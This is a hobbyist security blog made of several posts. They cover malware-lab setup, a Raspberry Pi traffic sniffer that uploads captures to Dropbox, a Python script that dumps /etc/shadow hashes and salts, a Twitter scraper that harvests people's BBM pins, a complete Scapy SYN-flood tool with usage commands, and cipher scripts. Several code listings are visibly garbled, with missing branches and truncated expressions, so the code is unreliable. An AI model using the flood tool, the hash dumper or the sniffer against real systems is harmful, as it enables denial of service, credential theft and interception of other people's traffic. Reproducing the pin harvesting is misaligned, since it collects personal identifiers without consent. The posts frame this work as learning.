Malware Analysis Part 2: First Attempt

Please read part 1 first if you would like to know how the analysis lab is setup.

There are various sites you can use to download sample malicious software. The one i used is called I wasn’t completely sure which sample to choose. I wanted one which was recent so i decided to get a a sample called “BC.Heuristic.Trojan.SusPacked.BF-6.A” I’m not going to link to it for obvious reasons but the MD5 hash of the sample is 0148d6e7f75480b3353f1416328b5135. This can be used as a search term on the open malware site to find sample i used in this analysis attempt.

Once i downloaded the file i took a snapshot of the registry and files on the machine using Regshot. I then ran the file, took another snapshot and compared the two. The restults shows that multiple files and folders were created when it executed.

Files added: 3
C:\Program Files\Windos\logg.dat
C:\Program Files\Windos\Windos.exe
Files [attributes?] modified: 3
C:\Documents and Settings\james\NTUSER.DAT.LOG
Folders added: 1
C:\Program Files\Windos

I also noticed that the Debian server has received a flood of DNS requests from the malware infected machine.


So the malware is attempting to fetch its IP for its server and i assume either download additional stuff or send some data to the server.

Because of this DNS request the next step i figured was to put my DNS server to good use and respond to the request with one of my own IP’s to see what it did next. So i opened the /etc/hosts file and added a new entry pointing (redacted) to my debian server I then started Wireshark on the malware infested machine and reset the DNS daemon.


This part i’m not 100% sure on. But what i can gather from this is that it is trying to start a TCP connection with my Debian server on the port 81 which is the TOR port. although it doesn’t necessarily mean its trying to connect in any way to the TOR network. Obviously whatever its trying to do the server isn’t responding appropriately (or not at all) and therefore the connection isn’t fully made. The next step i made was to set a netcat listener on the port and see what is being sent. To do this i entered the following command:

nc -l -p 81

-l specifies a listener and -p the port i want to listen on.

Untitled-1As you can see what i received is unintelligible.

In my next posting i will continue the analysis of this file. Once i figured out where to go from here :)

Malware Analysis Part 1: Lab Setup

At this stage I know very little about the Malware analysis process. I recently purchased a book on the subject called “Practical Malware Analysis” by Michael Sikorski and Andrew Honig. My aim is to read through the book and practice the techniques taught on real examples of malicious code. Updating this blog as i progress.

The first step, which I will detail today is the setup of my virtual lab. For the hardware I have used my old gaming computer. Its not very good at running games anymore but perfect for the malware analysis. I have it installed with Debian Linux distribution and have also installed VirtualBox.

There are pros and cons for using virtualisation for malware analysis. The pros include the ability to create snapshots of the working environment and having the ability to create virtual networks. Which i will explain later. One downside i have read about is some malware will behave differently if it discovers its being run in a virtualised environment. With the sole purpose of preventing it being analysed.

So in my setup i am using VirtualBox to create the virtual machines. I am using a Windows XP Professional machine. Loaded with any tools which i may need. Along with a Debian machine used as a DNS / Mail / IRC / ETC server. Some malware will attempt to communicate in some way with something on the internet. Weather it be through IRC, a simple DNS request or through mail protocol. Having a virtual Debian machine with these services installed it allows me to receive the requests and see in more detail what they are doing.


As you can see from the screenshot. I have created clones of both the virtual machines. This allows me to easily start afresh without having to reinstall all the tools again. Both the machines are in Host only mode and connected to a virtual network called vboxnet0. This prevents the malware escaping from the virtual machine and propagating throughout my network. I am also extremely paranoid and will unplug my network cable from the computer when performing the analysis.

The only software i will install on Debian to start with is a DNS server. This will allow me to redirect any DNS queries the malware may make to a computer of my choice (Mine). I decided to use Dnsmasq for this purpose as its very simple to setup.

I simply installed Dnsmasq with the command:

apt-get install dnamasq

And edited the /etc/dnsmasq.conf file to to only allow queries on a specific interface. In my case eth0

# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.

and to allow for logging of dns requests:

# For debugging purposes, log each DNS query as it passes through
# dnsmasq.

I also added into the /etc/hosts file a test record pointing the domain to IP address


Next i’m going to setup Windows XP to use my virtual Debian machine as a DNS server. I’m not going to explain how i did this. If your reading this you probably know already. I tested the configuration with nslookup.


As you can see the DNS server responded with the test ip of

I can monitor the DNS requests being made to the server by using the command:

tail -f /var/log/syslog

This should turn out useful when running the malware.


Now I’m going to detail some of the software I have installed on the target machine. At this stage I haven’t even attempted to look at any malware so I am likely missing some necessary tools. Once the malware is on the machine it won’t have access to the internet. Because of this I have tried to plan ahead and install everything I suspect I will need. There’s a high chance I will miss something having never done this before.

This tool allows you to take a snapshot of your machine in two different states and then compare them. For example, you may make a snapshot before and after you have run some malware. Comparing the two snapshots will allow you to see the changes the malware has made to the system. It records new files / folders and registry changes.

Process Explorer
This is basically task manager in steroids. It allows you to see the processes that are running

This allows you to monitor network traffic In this case in particular, traffic created by the malware.

Process Monitor
Allows you to see events which happen when a program is run. For example changes, modifications and execution of files.

Allows you to monitor files and network activity

I have never used this software before. From general reading, it allows you to run a program through it and watch how it interacts with the underlying system. It allows you to see the instructions it executes in the form of assembly language and also the data it stores.

A more powerful version of Windows notepad.

Part of the SysInternals suite. It allows you to scan a file for strings (sequence of readable characters)

Once I installed the software above I saved the virtual machine and cloned it. This lets me work on the cloned version when analysing the malware and reverting back to the original clean machine if I need to start again.

True Random Number Generator using the Raspberry Pi

Last weekend i made my Raspberry Pi into a true random number generator using the static from a TV. Here in the UK we no longer receive analog terrestrial broadcasting so finding static on my TV is as simple as putting it on the analogue channel.

The setup i was using is an eSecure – USB 8MP webcam plugged into the Raspberry Pi and i pointed this at the TV. I used a python script to calculate the random numbers. I also made a video of the process which can be found at this link here.

The first step was to take a picture of the static on the TV. To do this i used the subprocess module in python.

captureImage = subprocess.Popen(["fswebcam", "-r", "356x292", "-d", "/dev/video0", "static.jpg", "--skip", "10"], stdout=devNull, stderr=devNull)

As you can see this simple spawns the fswebcam process to take a picture and save it as static.jpg These pictures look like the following:

static1 static2

The next stage is to convert these images into a black/white image. I imported the Python image library into my script to manipulate and read the image files.

staticImage ="static.jpg")
bW_Image = staticImage.convert('1')


The next stage was to iterate over the static image and read the value of each pixel. Each value being either 0 or 255 depending on if the pixel was white or black. The value was entered into a variable called randomBits with 0 for a white pixel and 1 for a black pixel.

while pixelRow < staticImage.size[0]:
    while pixelColumn < staticImage.size[1]:
        if imageToProcess[pixelRow, pixelColumn] == 0:
            randomBits = randomBits + "0"
            randomBits = randomBits + "1"
        pixelColumn = pixelColumn + 1
    pixelRow = pixelRow + 1
    pixelColumn = 0

This randomBits variable is then written to an output files as a base 10 number. This means that the long binary string is converted to a decimal value and written to the output file. This decimal number is the random value calculated from the image.

output = open('output.txt', 'w')
    output.write(str(int(randomBits, 2)))
    print int(randomBits, 2)

The full source code can be copied from the box below.

import Image
import subprocess
devNull = open('/dev/null', 'w')#used to output the fswebcam stdout and stderr
name = 0
while True:
    name = name + 1
    randomBits = ""
    pixelRow = 0
    pixelColumn = 0
    captureImage = subprocess.Popen(["fswebcam", "-r", "356x292", "-d", "/dev/video0", "static.jpg", "--skip", "10"], stdout=devNull, stderr=devNull)
    captureImage.communicate()#executes the command detailed above with takes a picture using the webcam
    staticImage ="static.jpg")#Opens the image
    bW_Image = staticImage.convert('1')#Converts the image to a black or white image
    imageToProcess = bW_Image.load()#Saves the image to a variable that can be iterated through
    while pixelRow < staticImage.size[0]:#Iterates through the image pixel by pixel
        while pixelColumn < staticImage.size[1]:
            if imageToProcess[pixelRow, pixelColumn] == 0:
                randomBits = randomBits + "0"#Adds a 0 to the randomBits variable if the current pixel is white
                randomBits = randomBits + "1"#Adds a 1 to the randomBits variable if the current pixel is black
            pixelColumn = pixelColumn + 1
        pixelRow = pixelRow + 1
        pixelColumn = 0
    output = open('output.txt', 'w')
    output.write(str(int(randomBits, 2)))#Writes the randomBits Variable to the output file converted to a decimal number
    print int(randomBits, 2)#Also prints this decimal number to the terminal

Packet Sniffing using the Raspberry Pi

In this post i intend to detail how i setup the raspberry pi to perform packet sniffing between two network devices. I made a YouTube video in which i explain how it works and below you will find both the shell script and python script i used to setup the bridge and dump the packets respectively.

The network was setup like this:

diagram showing the network layout. from right to left. computer, raspberry pi, laptop

The raspberry pi is placed in the middle and any data traveling between each device is captured by it. A second USB to Ethernet adapter is used to provide the second interface. The adapter i used is a USB to Fast Ethernet 10100 Mbps Network LAN Adapter Vista Linux 27723.

When the Raspberry pi starts it loads two scripts. The first is this shell script below:

ifconfig eth0
ifconfig eth1
brctl addbr bridge0
brctl addif bridge0 eth0
brctl addif bridge0 eth1
dhclient bridge0
ifconfig bridge0 up

This script removed the IP address from eth0 and eth1. It then creates a bridge called bridge0. Adds the interfaces to bridge0 and starts the bridge.

##Edit## The shell script now also assigns a network address to the bridge interface to allow for network connectivity. (dhclient bridge0)

The second script that starts after the one above is this python script below. It implements the Python Dropbox Uploader package which can be downloaded here.

import subprocess
from dbupload import upload_file #Used for Dropbox uploading
from datetime import datetime # Used the genreate the filename
count = 0 #Counts the number of files that have been dumped
while True:
    count = count + 1
    fileName = str( + "-" + str( + "-" + str( + " AT " + str( + "-" + str(
    tcpDumpProcess = subprocess.Popen(["tcpdump", "-Z", "root", "-w", fileName, "-i", "bridge0", "-G", "60", "-W", "1"]) #Sets up the TCPDump command
    tcpDumpProcess.communicate() #Runs the TCPDump command
    print "Currently dumping file number " + str(count) + "."
    upload_file(fileName,"/",fileName, "YOUR_EMAIL","YOUR_PASSWORD") #Uploads the dump file to dropbox
    print "File uploaded Successfully"

This can obviously be done without using python and running the TCPDump command from command line. My intention was to integrate Dropbox uploading to the process but failed due to the inability to gain an internet connection from the raspberry pi when configured with a software bridge.
An internet connection can be configured on the Raspberry Pi simply by adding network settings to the bridge interface. in my case i used DHCP to automatically do this by adding dhclient bridge0 to the shell script.

With both these files saves onto the raspberry pi and executed from the rc.local file at startup it will allow the raspberry pi to automatically capture network traffic between two devices.

Dumping Linux Password Hashes

In my push to keep learning the Python programming language i thought a next good step is to make a simple script that grabs the password hashes on a Linux device and dump them to a file. The dump is formatted so that it is easy to read unlike the formatting used in the shadow file. I made this script purely for the challenge. It is not intended to be used for anything other than educational purposes.

So some background. Linux passwords are stored as a hash. A hash is a one way mathematical function which is used on the password to change it to something unintelligible. It is important to understand that this is a one way process. You are unable to convert some hashed data back to its intelligible form. One way of cracking hashed passwords is to use rainbow tables. These are tables populated with precomputed hashes and there paired plaintext password. They usually contain 1000′s of entries each with matching plaintext / hash value pairs.

Lets say for example you have a password hash: 436ad45345deed32. You want to find the password this hash represents using a rainbow table.

The rainbow table may look like the following:

        | password             |  43f54abeee342abe          |
        |                      |                            |
        | qwerty               |  AB5445afd56ad345          |
        |                      |                            |
        | dragon               |  4554bd44dd34cb32          |
        |                      |                            |
        | monkey               |  f632abcd345c34dc          |
        |                      |                            |
        | supersecurepass      |  436ad45345deed32          |
        |                      |                            |
        | letmein              |  4fd43344decad356          |
        |                      |                            |
        | baseball             |  ab4564fd4ed4556d          |
        |                      |                            |
        | mypass               |  c34ddef567ab345d          |
        |                      |                            |

You check your hash value with each one in the rainbow table until a match is found. When the match is found the matching plaintext password is looked up, you now have the password.

To combat this weakness an extra value is used when hashing the password. This value is called a salt. The salt is a random value which is added to the password before it is hashed.

Without Salt:

   Password        Hash Function           Hash Value
  |           |                        |                   |
  |secpass123 | +------------------->  | ad4565bcd34dea    |
  |           |                        |                   |

With Salt:

   Password       Salt           Concatenation         Hash Function     Hash Value
  |          |             |                       |                  |                |
  |secpass123| mysaltvalue | secpass123mysaltvalue | +------------->  | adb345252aed4f |
  |          |             |                       |                  |                |

By introducing this salt value before the hashing takes place it makes the rainbow tables much less efficient. To generate a rainbow table not only will you need a a list of passwords but also a salt value to go with each password. If the salt value is not known then the rainbow table wont work.

In UNIX systems these hashes are stored in a shadow file located in /etc/shadow. This is obviously locked out to anyone other than root by default. This means the script wont work unless run under root or sudo.

How it works

Running the script below reads this shadow file and outputs the results to both the terminal and a text file in the same location as where you saved the python script. The text file is called dump.txt.

the way the hash value is stored is each entry is delimited by a colon. For example the first part is the username, followed by a colon. The next part is the hash and salt, followed by a colon etc..
The script relies a lot on slices which allow you to slice a string into parts.

An example of an entry in the shadow file


To get the username i sliced from index 0 of the string to the index of the first colon.
After the first colon there is the characters $?$. the ? being a number which indicates the hash function which is used on the password. This value was easily obtained in the script as it is always two characters from the first colon.
Next is the salt value. This is directly after the hash type and ends with the $. A for loop is used in the script to gather index values for both colons and dollar symbols. This make the extraction of the values in the whole string much simpler.
Next is the password hash. Gathered by slicing the whole string from the index value of the 3rd dollar sign to the 2nd colon.
The last piece gathered in the script is the amount of time left till the password expires. This was gathered by slicing the string between the 4th and 5th colons.

shadowFile = open('/etc/shadow', 'r')
shadowFileList = shadowFile.readlines()
dump = open('dump.txt', 'w')
for user in shadowFileList:
    if '$' in user:
        print 'The username is: ' + user[0:user.find(':')]
        dump.write('The username is: ' + user[0:user.find(':')] + '\n')
        hashtype = user[user.find(':') + 2]
        count = 0
        for letter in hashtype:
            if letter == '$':
                count = count + 1
        if hashtype == '1':
            hashtype = 'The hashing algorithm used is: MD5'
            dump.write('The hashing algorithm used is: MD5\n')
        elif hashtype == '2':
            hashtype = 'The hashing algorithm used is: BlowFish'
            dump.write('The hashing algorithm used is: BlowFish\n')
        elif hashtype == '5':
            hashtype = 'The hashing algorithm used is: SHA256'
            dump.write('The hashing algorithm used is: SHA256\n')
        elif hashtype == '6':
            hashtype = 'The hashing algorithm used is: SHA512'
            dump.write('The hashing algorithm used is: SHA512\n')
            hashtype = 'The hashing algorithm used is Unknown. It has a hash code value of:' + hashtype + '.'
            dump.write('The username is: ' + user[0:user.find(':')] + '\n')
        print hashtype
        delimitercolon = []
        delimiterdolla = []
        count = 0
        for char in user:
            if char == ':':
            if char == '$':
            count = count + 1
        print 'The Hash is: ' + user[delimiterdolla[2] + 1:delimitercolon[1]]
        dump.write('The Hash is: ' + user[delimiterdolla[2] + 1:delimitercolon[1]] + '\n')
        print 'The Salt is: ' + user[delimiterdolla[1] + 1:delimiterdolla[2]]
        dump.write('The Salt is: ' + user[delimiterdolla[1] + 1:delimiterdolla[2]] + '\n')
        print 'The password is set to expire in ' + user[delimitercolon[3] + 1:delimitercolon[4]] + ' days.\n\n'
        dump.write('The password is set to expire in ' + user[delimitercolon[3] + 1:delimitercolon[4]] + ' days.\n\n\n')

The output looks like the following:

 The username is: test
 The hashing algorithm used is: SHA512
 The Hash is: oDexE5blBiNer7V2qHXVgQvdhSzChH2kmQ2.op4nHLPxMldePB3CyEizwyhhLo3lwpTIFnzqN30KuQOKEFuVe1
 The Salt is: 54dYBZqz
 The password is set to expire in 99999 days.

If you have any questions please let me know in the comments or by email james[at] Feel free to use the code, change it in anyway or whatever.

BBM Pin Aggregation from Twitter

I was trying to think of a good way to get some more practice with python especially in interacting with some kind of API. @wimremes on twitter gave me a good idea with this tweet.

I made a simple python script using the python-twitter wrapper for the twitter API. It performs a search every 3 minutes for the search term “my bbm pin” and saves the pin into a results.txt file in the same folder. I don’t know why people wouldn’t want to share their BBM pin with random people. I thought it was quite amusing nonetheless. You will need the Python-Twitter Wrapper for it to work.

Just leave this script running and see how many it finds.

import twitter
import string
import re
import time
api = twitter.Api(consumer_key ='YOUR_KEY',  consumer_secret='YOUR_SECRET',  access_token_key='YOUR_ACCESS_KEY',  access_token_secret='YOUR_ACCESS_SECRET') #Enter your Twitter API details here.
loopControl = True
while loopControl == True: #used to keep the programming running
    bbmPins = api.GetSearch(term='my bbm pin') #The search term sent to the twitter API
    for bbm in bbmPins:
        status =  bbm.GetText().encode('utf-8') #Converts the unicode string returned by the API to UTF-8. this allows for punctuation to be removed more easily.
        statusNoPunct = status.translate(None, string.punctuation).lower() #Removes the punctuation and converts the statuses to lower case.
        wordList = statusNoPunct.split() #Splits the statuses into individual words.
        for word in wordList:
            if len(word) == 8: #Checks if the word in 8 characters long. (BBM pins are 8 characters long).
            	#Filters out any non-hexadecimal words (BBM pins are hexadecimal)
                if not 'g' in word and not 'h' in word and not 'i' in word and not 'j' in word and not 'k' in word and not 'l' in word and not 'm' in word and not 'n' in word and not 'o' in word and not 'p' in word and not 'q' in word and not 'r' in word and not 's' in word and not 't' in word and not 'u' in word and not 'v' in word and not 'w' in word and not 'x' in word and not 'y' in word and not 'z' in word:
                    results = open('results.txt', 'a+')
                    if not word in #Checks if the pin already exists in the file
                        results.write(word + "\n") #Writes the pin to the file
                    print word
            if len(word) == 11: #Some people posted the BBM pins as so Pin:25B46EE0. With the : and . omitted in line 11 this will be 11 characters long.
                if 'pin' in word:
                    sliceWord = word[3: len(word)] #Strips the word "pin" from the beginning of the pin (pin25B46EE0 > 25B46EE0)
                    results = open('results.txt', 'a+')
                    if not sliceWord in #Checks if the pin already exists in the file.
                        results.write(sliceWord + "\n") #Writes the pin to the file
                    print sliceWord
    time.sleep(180) #sleep for 3 minutes before starting again.

SYN Flooding with Scapy and Python

What is a SYN flood?

When a connection is made from client to server through TCP it is initialized with a three way handshake. Each of the 3 stages of the handshake sends a different type of TCP segment across the network.

  1. Client sends SYN (synchronize) to server
  2. Server sends SYN-ACK (synchronize Acknowledgement) back to the client
  3. Client sends ACK back to server

This 3 way handshake establishes the rest of the connection between the client and server.
When performing a SYN flood you’re only completing the first two parts of the three way handshake. A request is made with the server to synchronise. The server Acknowledges the synchronisation but no acknowledgement from the client to the server is sent back. This causes the server to have half open connections which can result in a denial of service if the process is repeated and replicated by multiple machines.

Initial setup

By default the Linux kernel sends an RST in response to a SYN-ACK received from the server. This is because of a lack of communication between scapy and the kernel. You can read more about it Here. For this reason an IPTABLES rule needs to be created to block any outgoing RST packets.

sudo iptables -A OUTPUT -p tcp -s –tcp-flags RST RST -j DROP

(the IP address is the source address, the local IP address)

My Python Script

Below is a Python script that implements the scapy program which allows you to both manipulate and send packets. As well as a whole host of other things. It is created purely as an educational tool and shows how Scapy can be implemented into python.

the python script takes 3 arguments.

-d The destination IP address for the SYN packet
-c The amount of SYN packets to send. (enter X for unlimited)
-p The destination port for the SYN packet

As it uses the send function in scapy it must be run as root user.


sudo python -d -c x -p 80

This will send a constant SYN flood to the ip address and to port 80.

sudo python -d -c 100 -p 80

This will send 100 SYN segments to on port 80.

The script sets the source IP to your local IP. The source port is randomised.

import sys
import random
import logging # This and the following line are used to omit the IPv6 error displayed by importing scapy.
from scapy.all import *
import argparse
import os
import urllib2
if os.getuid() != 0: # Checks to see if the user running the script is root.
    print("You need to run this program as root for it to function correctly.")
parser = argparse.ArgumentParser(description='This educational tool sends SYN requests to the target specified in the arguments.') # This and preceding 4 lines used to control the arguments entered in the CLI.
parser.add_argument('-d', action="store",dest='source', help='The destination IP address for the SYN packet')
parser.add_argument('-c', action="store",dest='count', help='The amount of SYN packets to send. (enter X for unlimited)')
parser.add_argument('-p', action="store",dest='port', help='The destination port for the SYN packet')
args = parser.parse_args()
if len(sys.argv) == 1: # Forces the help text to be displayed if no arguments are entered
args = vars(args) # converts the arguments into dictionary format for easier retrieval.
iterationCount = 0 # variable used to control the while loop for the amount of times a packet is sent.
if args['count'] == "X" or args['count'] == "x": # If the user entered an X or x into the count argument (wants unlimited SYN segments sent)
    while (1 == 1):
        a=IP(dst=args['source'])/TCP(flags="S",  sport=RandShort(),  dport=int(args['port'])) # Creates the packet and assigns it to variable a
        send(a,  verbose=0) # Sends the Packet
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Packet Sent")
else: # executed if the user defined an amount of segments to send.
    while iterationCount < int(args['count']):
        a=IP(dst=args['source'])/TCP(flags="S", sport=RandShort(), dport=int(args['port'])) # Creates the packet and assigns it to variable a
        send(a,  verbose=0) # Sends the Packet
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Packet Sent")
print("All packets successfully sent.")

The Results
When the script is executed the packets are sent to the destination IP address. This can be viewed in wireshark. note the random ports which appear on each packet.

The target was a Backtrack 5 R2 virtual machine which was running an Apache web server on port 80. By entering the command “netstat -at” you can view all listening TCP ports.
As you can see from the screenshot there are 10 listening TCP ports which have been created because of the 10 SYN segments that were sent previously.

You can get more information about scapy at You can read an advisory for the TCP SYN attack at

The Vigenère cipher in Python

The Vigenère cipher is a polyalphabetic substitution cipher system designed by Giovan Battista Bellaso and improved upon by Blaise de Vigenère. It functions very similarly to a Caesar shift cipher where a shift of lettering occurs. Unlike the Caesar shift cipher the Vigenère cipher performs different shift per character. For example the first letter may have a shift of 4 and the second letter may have a shift of 8 and so on. A key is used to define the shift value for each letter. In this script they key is a letter of the alphabet.

The program works by retrieving the index values of the characters from the key and the plain text in turn. These values are then added together and the resulting number is equal to the index value corresponding to the cipher text. For example:
We have an alphabet with each letter assigned a value a = 0 b = 1 c = 2 and so on…
If we were to have the key R and the plain text letter P we would add the values 17 for R and 15 for P. 17 + 15 = 32
If the value is greater than 26 we keep subtracting 26 until we get a number less than 26. 32 – 26 = 6.
We now look up the value 6 in the alphabet index. the value at index 6 is G.
The program simply loops through this process for each letter in the plain text till the cipher text is complete.
Feel free to use the code however you want. Let me know if you do as I would be interested in its implementation.

# Name:        Vigenere Cipher
# Purpose:
# Author:      James Woolley
# Created:     17/07/2012
# Copyright:   (c) James 2012
# Licence:     Open Source
#Creates the base Alphabet which is used for finding preceeding characters from the ciphertext.
baseAlphabet = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
print ("Welcome to a Vigenere Cipher encrypter. You will first be asked to enter the plain text to be encrypted and then the key you would like to use in the encryption process. The resulting text will be the cipher text.")
plainText = raw_input("Please enter the plain text")
key = raw_input("Please enter the key")
keyList = []
keyLength = 0
while keyLength < len(plainText):
    for char in key:#Adds the users entered key into a list character by character. Also makes the key the same length as plainText
        if keyLength < len(plainText):
            keyLength = keyLength + 1
completeCipherText = [] #The variable each processed letter is appended to
cipherCharIndexValue = 0#This is the value used to temporaily store the ciphertext character during the iteration
keyIncrement = 0
for plainTextChar in plainText:#iterates through the plain text
        cipherCharIndexValue = baseAlphabet.index(keyList[keyIncrement]) + baseAlphabet.index(plainTextChar)#Adds the base alphabets index value of the key and the plain text char
        while cipherCharIndexValue > 25:
            cipherCharIndexValue = cipherCharIndexValue - 26#makes the addition value under 26 as to not go out of range of base alphabet tuple
        completeCipherText.append(baseAlphabet[cipherCharIndexValue])#appends the ciphertext character to the completeCipherText variable. The character is the index of the key + index of the plainTextChar from baseAlphabet
        keyIncrement = keyIncrement + 1#Moves onto the next key
print ''.join(completeCipherText)#Makes the result a strings for printing to the console.

Frequency Analysis with Python

Frequency Analysis is commonly used in cryptanalysis on classical ciphers as a step in deducing the plain text from cipher text. It works on the principle that certain letters on average appear more frequently than others. For example the letters “E” and “T” in the English language are most common. This means in monoalphabetic ciphers the most common letter found during frequency analysis is likely to be a common letter in the English language.
Frequency analysis works better the larger the text to be analysed is. This is because the results aren’t as easily skewed with less common letters populating a short sentence.
This script allows for analysis of single letters or grouping of letters known as n-grams. This is useful when common English letter pairs like TH and ER can be matched to the corresponding letter pairs in the analysed cipher text.

This is my second python program. You enter some cipher text into the input. You then select what n-gram you want to analyse for and press enter. The program print the n-grams it finds along with the occurrences. The results are printed in order of value.

# Name:        Frequency Analysis
# Purpose:     Count the amount of n-grams in ciphertext
# Author:      James Woolley
# Created:     28/06/2012
# Copyright:   (c) James 2012
# Licence:     Open Source
inputText = str(raw_input("Please enter the cipher text to be analysed:")).replace(" ", "") #Input used to enter the cipher text. replace used to strip whitespace.
ngramDict = {}
highestValue = 0
def ngram(n): #Function used to populate ngramDict with n-grams. The argument is the amount of characters per n-gram.
    count = 0
    for letter in inputText:
        if str(inputText[count : count + n]) in ngramDict: #Check if the current n-gram is in ngramDict
            ngramDict[str(inputText[count : count + n])] = ngramDict[str(inputText[count : count + n])] + 1 #increments its value by 1
            ngramDict[str(inputText[count : count + n])] = 1 #Adds the n-gram and assigns it the value 1
        count = count + 1
    for bigram in ngramDict.keys(): #Iterates over the Bigram dict and removes any values which are less than the adaquate size (< n argument in function)
        if len(bigram) < n:
            del ngramDict[bigram]
ngram(int(raw_input("Please enter the n-gram value. (eg bigrams = 2 trigrams = 3)")))
ngramList = [ (v,k) for k,v in ngramDict.iteritems() ] #iterates through the ngramDict. Swaps the keys and values and places them in a tuple which is in a list to be sorted.
ngramList.sort(reverse=True) #Sorts the list by the value of the tuple
for v,k in ngramList: #Iterates through the list and prints the ngram along with the amount of occurrences
    print("There are " + str(v) + " " + str(k))

Cracking the Caesar Shift Cipher with Python

I recently started learning Python and have created a small script which can encrypt or decrypt plaintext or cipher text from a Caesar Shift Cipher. It’s nothing special but I’m curious as to how much easier it can be accomplished. I’m sure my method is very long winded and substantially more complicated than it needs to be.

(Currently wont work with Spaces) Now works with Spaces.

# Name:        Ceaser Shift Cipher
# Purpose:      Example code for analysing shifts on plain text by a Caesar shift cipher.
# Author:      James Woolley
# Created:     14/06/2012
# Copyright:   Open Source
#Creates the base Alphabet which is used for finding preceeding characters from the ciphertext.
baseAlphabet = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')
print ("Welcome to a python Caesar shift cipher analyser. You will first be asked to enter the cipher text to be decrypted and then the amount of shifts you want to perform. Entering ALL for the shift amount will iterate through all 26 combinations.")
cipherText = raw_input("Please enter the Cipher text")
shiftAmount = raw_input("Please enter the shift amount. Enter ALL for brute force shifting.")
if shiftAmount == "all":
    shiftAmount = str(shiftAmount)
    shiftAmount = int(shiftAmount)
baseLetterIndex = 0
completePlainText = [] #The variable each processed letter is appended to
def shiftAndStore(shift):
    for increment in cipherText:
        for value in baseAlphabet:
                    if value == increment:
                            while shift + baseAlphabet.index(value) >= 26: #Checks if the shift will be higher more than the 26 letters of the alphabet.
                                shift = shift - 26 #If shifts are higher 26 is subtracted till the shift and base alphabet value is lower than 26.
                            baseLetterIndex = baseAlphabet.index(value) + shift #assigns the index value of the processed letter to baseLetterIndex variable.
                            completePlainText.append(baseAlphabet[baseLetterIndex]) # appends the processed letter to the completePlainText variable.
                    if increment == (" "): #Handles the spaces Temporarily makes the value of increment X to prevent it looping 26 times.
                        completePlainText.append(" ")
                        increment = ("X")

if shiftAmount == "all": #Checks weather user selected brute force method or specific shift value.
    shiftAmount = int(0)
    while shiftAmount < 25: #Iterates through all 26 combinations producing a processed value each time.
        shiftAmount = shiftAmount + 1
        print "The Encoded / Decoded text on shift  " + str(shiftAmount - 1) + " is " + (''.join(completePlainText)) #Prints the shift amount and processed text.
        completePlainText = []
else: #Executed if specific shift value is chosen and not brute force.
    print "The Shift Amount is " + str(shiftAmount)
    print "The Encoded / Decoded text is " + (''.join(completePlainText))